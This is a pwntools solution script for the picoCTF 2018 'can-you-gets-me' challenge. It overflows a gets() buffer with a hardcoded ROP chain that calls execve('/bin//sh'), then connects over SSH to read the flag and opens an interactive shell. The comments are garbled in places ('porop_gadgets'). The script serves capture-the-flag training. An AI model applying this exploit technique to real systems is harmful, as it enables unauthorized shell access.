Binary Exploitation/can-you-gets-me/solution/solve.py

#!/usr/bin/python
from pwn import *

USER = 'Platy' # Change username accordingly.

padding = 'A' * 28
# execve generated by ROPgadget
rop_gadgets = p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea060) # @ .data
rop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret
rop_gadgets += '/bin'
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea064) # @ .data + 4
rop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret
rop_gadgets += '//sh'
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
rop_gadgets += p32(0x080481c9) # porop_gadgets ebx ; ret
rop_gadgets += p32(0x080ea060) # @ .data
rop_gadgets += p32(0x080de955) # porop_gadgets ecx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0806cc25) # int 0x80

exploit = padding + rop_gadgets

s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first

py = s.run('cd /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d; ./gets')
print py.recv()
py.sendline(exploit)
py.sendline('cat flag.txt')
print py.recv()
py.interactive()